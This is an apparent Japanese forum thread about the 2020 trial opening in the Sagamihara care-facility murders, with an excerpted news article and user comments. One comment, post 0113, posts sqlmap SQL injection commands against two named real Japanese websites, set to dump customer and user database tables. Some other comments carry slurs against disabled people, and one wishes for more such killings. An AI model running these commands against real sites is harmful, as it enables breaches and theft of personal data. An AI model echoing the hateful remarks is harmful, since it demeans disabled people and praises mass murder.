X



【相模原市・障害者施設19人殺害事件】責任能力が争点に 8日に初公判 植松聖被告なお障害者の存在否定
■ このスレッドは過去ログ倉庫に格納されています
0001ちーたろlove&peace ★
垢版 |
2020/01/06(月) 19:54:42.35ID:jvy5Y+u39
1/5(日) 21:43配信

https://amd.c.yimg.jp/amd/20200105-00000062-mai-000-1-view.jpg

 相模原市の障害者施設「津久井やまゆり園」で2016年7月、利用者ら19人が殺害され、26人が負傷した事件で、殺人罪などに問われた元同園職員、植松聖(さとし)被告(29)の裁判員裁判が8日、横浜地裁(青沼潔裁判長)で始まる。事件当時の責任能力の有無や程度が最大の争点になる。「障害者は不幸をつくる」という差別的な考えから事件に及んだとされる被告が、被害者の家族らが見つめる法廷でどのように事件と向き合うかも注目される。

【写真特集】公開された「やまゆり園」の内部

 事件後の精神鑑定で被告は自分を特別な存在と思い込む「自己愛性パーソナリティー障害」と診断された。人格障害の一つだが、一般的に物事の善悪を判断して行動をコントロールすることは可能とされ、検察側は完全責任能力があると判断して被告を起訴した。

 植松被告は毎日新聞の取材に、障害などがあって意思疎通ができない人は「社会にいるべきではない」と独善的な主張を展開して事件を正当化している。初公判で起訴内容を認める考えを示す一方で、弁護人の主張は「任せている」という。

 関係者によると、弁護側は事件当時は薬物の影響から刑事罰に問えない心神喪失状態だったとして無罪を主張するとみられる。事件前に措置入院した際に「大麻精神病」などと診断され、逮捕後の尿鑑定でも大麻の陽性反応が出ていた。

 一方、被告は監視の目が緩くなる未明に職員を動けなくするための結束バンドを用意して侵入し、意思疎通が難しいと判断した利用者を狙ったとされる。検察側は薬物の影響について弁護側の主張を否定した上で、被告の説明に一貫性があり、事件が計画的に実行された点などから自らの行動をコントロールできていたと立証していくとみられる。

 事件を巡っては神奈川県警が被害者の氏名を公表しない異例の措置をとった。刑事裁判は実名審理が原則とされるものの、今回は法廷でも名前を明らかにしないことが決まった。被害者は負傷の程度などによって甲、乙、丙の3グループに分けられ、「甲A」「乙B」といった呼称がそれぞれに付けられる。

 https://headlines.yahoo.co.jp/hl?a=20200105-00000062-mai-soci
※抜粋記事です。詳しくはリンク先へお願い致します。
0101名無しさん@1周年
垢版 |
2020/01/08(水) 09:34:33.52ID:/X1wXvtB0
[昭和43年2月] 中日ニュース。
No.733_2「山の子どもたち」
https://youtu.be/ngkPc_ert_k
0102名無しさん@1周年
垢版 |
2020/01/08(水) 09:51:22.82ID:hn+2tVnl0
トンキン高裁「裁判員裁判は高裁でひっくり返すから 安心しなさいww」
0103名無しさん@1周年
垢版 |
2020/01/08(水) 10:41:54.44ID:PZYKkT590
単に仕事も何もかも、自分の人生に不満でやっただけ。
障害者うんぬんなんて後付け
0104名無しさん@1周年
垢版 |
2020/01/08(水) 10:44:45.15ID:4uuRS8pp0
この事件の被害者だろうけど
女の子の写真が沢山テレビに出てた
見た感じ障害者っぽくはなかったがごく普通の可愛い子で
親とじゃれてて楽しそうな写真も出てた。
親からしても可愛い子だったろうなという感じ
障害者だからといって愛されないわけじゃないと思う
0105名無しさん@1周年
垢版 |
2020/01/08(水) 12:39:51.52ID:JCcRertu0
もっとこういうはんざいがおきてほしいな〜






うえまつのいってることはおまえらのほんねなんだおぅwwwwwwww
ぎぜんしゃおつ
0106名無しさん@1周年
垢版 |
2020/01/08(水) 16:43:32.42ID:yO9ECKg20
自己否定かよw
0107名無しさん@1周年
垢版 |
2020/01/08(水) 21:21:48.65ID:5CrYDs4W0
>>100
植松の思考が、「デスノート」の主人公のそれとそっくりだと思ったからさ
0110名無しさん@1周年
垢版 |
2020/01/09(木) 15:15:13.00ID:oKmlffPg0
>>89

あなた個人の感想でしょ。
どうぞ、その感想に則って、やるべきことを実行してくださいな。
>>1の被告も、個人の感想を持って、それを実行したけどね。
0111名無しさん@1周年
垢版 |
2020/01/09(木) 16:21:04.21ID:bOvnXXwZ0
ガイジにも人権があるんですよ
0113名無しさん@1周年
垢版 |
2020/01/10(金) 08:17:43.94ID:0rAAT7Fv0
SQLInjection

Actual vulnerability commands for SQL Injection using sqlpmap.

Shanhai radio / murasakishikibu Exploit code.

python sqlmap.py -u "http://s-radio.jp/book/shop/detail.php"; --data="code=6441-A7' and [t] and '1'='1" --dbs --columns -T customer --dump

Shanhai radio / murasakishikibu Convering to string.

print(b'Byte String Here'.decode('cp932'))

Sagamihara Residents' Association Exploit code.

python sqlmap.py -u "http://www.sagamihara-jichiren.jp/topics/detail.php?id=[t]" -D sagamijcrdb -T user_db --columns --dump
0114名無しさん@1周年
垢版 |
2020/01/10(金) 11:52:57.48ID:3y6Ya7C80
障害者の子を持つ親の苦労は相当なものだろう。辛いと思うよ。
この部分について植松被告の言うことは理解できる。 
だから障害者を殺してよいという理屈は理解不能だけどな。
0115名無しさん@1周年
垢版 |
2020/01/10(金) 20:37:21.39ID:sWFyPUIW0
ガイジヒキコモリは自己責任甘やかすな
0116名無しさん@1周年
垢版 |
2020/01/11(土) 10:19:12.17ID:fDpBco0z0
>>114
本当に苦労や辛さだけだろうか?

障害者殺傷事件 被告出廷し2回目の審理 横浜地裁
https://www3.nhk.or.jp/news/html/20200110/k10012241551000.html

> 10日の裁判では、刃物で刺されて大けがをした尾野一矢さん(46)の行動が
> 事件直後の警察への通報につながっていたことが明らかになりました。
>
> 10日の裁判では被告に拘束され現場にいるよう強いられた職員の供述調書が読み上げられました。
>
> それによりますと職員は「被告が逃走したあと部屋から尾野さんが出てきました。
> 尾野さんは『痛い』と言っていて、私は怖かったけど入所者の前で怖さを見せてはいけないと思い
> 『痛いけど頑張ってね』と励ましました」と説明したということです。
>
> そのうえで、けがをしていた尾野さんに携帯電話を持ってきてもらうよう依頼したということで、
> 「施設内のリビングにあった携帯電話を持ってきてくれたので、
> 結束されていた親指以外の指で110番通報しました」と話したということです。
>
> また「尾野さんは『痛いよう』と言っていたが、私は『誰か来てくれるからね。痛いけど頑張ろうね』
> と言いました」とも説明したということです。
>
> 裁判のあと取材に応じた尾野さんの父親の剛志さんは「きょうまで一矢は刺されたあと
> そのまま気絶したかと思っていました。頑張ったんだなと感じ息子を本当にほめてやりたいです。
> 妻も僕も泣きながら聞いていました」と話していました。

健常者が拘束されている中で、痛みに耐えながら、持てる能力の全てを使って110番通報につなげた
それを両親が褒めてあげたいと言ってる事には誰もが共感するだろう
意思疎通できない人間だけを刺したなんていう植松の大嘘も暴かれた
尾野一矢さんは立派な人間だよ
0117名無しさん@1周年
垢版 |
2020/01/11(土) 13:09:13.13ID:0NlAAACK0
>>116
人による

それは健常者も同じ
交通事故を起こして怪我した人が車外に出て助けを求めていても、知らんぷりして通過していくドライバーもいる
(怪我したのは中学校の同級生で、DQN車だったから助けてもらえなかったのかも)
一方で、知的障害者施設の入所者が昼食のパンを自分の部屋に持ち帰って数日後にこっそり食べて窒息しかかったとき、喋れない重度の入所者が気付き、職員のところに走って行き手を引っ張って知らせたこともある
(勤め先での事故、発見が早くて助けることが出来た)
■ このスレッドは過去ログ倉庫に格納されています

ニューススポーツなんでも実況